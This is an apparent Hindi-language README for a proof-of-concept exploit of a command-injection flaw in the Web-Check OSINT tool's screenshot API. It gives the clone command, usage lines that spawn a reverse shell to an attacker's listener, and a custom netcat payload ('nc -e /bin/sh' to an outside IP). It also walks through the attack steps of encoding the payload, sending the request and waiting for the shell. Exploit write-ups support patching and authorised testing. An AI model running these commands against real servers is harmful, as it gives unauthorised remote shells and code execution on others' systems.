
CVE-2025-32778 के लिए PoC एक्सप्लॉइट: Web-Check OSINT टूल में कमांड इंजेक्शन
CVE-2025-32778 एक गंभीर कमांड इंजेक्शन भेद्यता है Web-Check OSINT टूल में, जो Lissy93 द्वारा बनाया गया है।
यह अप्रमाणित हमलावरों को स्क्रीनशॉट API में url पैरामीटर के माध्यम से मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देता है।
यह Python स्क्रिप्ट शोषण को स्वचालित करती है और रिवर्स शेल उत्पन्न कर सकती है या कस्टम शेल पेलोड स्वीकार कर सकती है।
url कमांड इंजेक्शन का शोषण करें।--lhost और --lport के साथ रिवर्स शेल।--shell के माध्यम से कस्टम शेल।--shell को --lhost/--lport के साथ संयोजित करने से रोकता है।pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
लक्ष्य URL को scheme://host[:port] में सामान्यीकृत करें।
पेलोड तैयार करें:
--lhost और --lport का उपयोग करके रिवर्स शेल उत्पन्न करें।--shell के साथ एक कच्चा शेल कमांड का उपयोग करें।सुरक्षित URL इंजेक्शन के लिए शेल पेलोड को एनकोड करें।
पेलोड के साथ /api/screenshot/ पर एक HTTP GET अनुरोध भेजें।
रिवर्स शेल कनेक्शन की प्रतीक्षा करें।
00xCanelo
GitHub Profile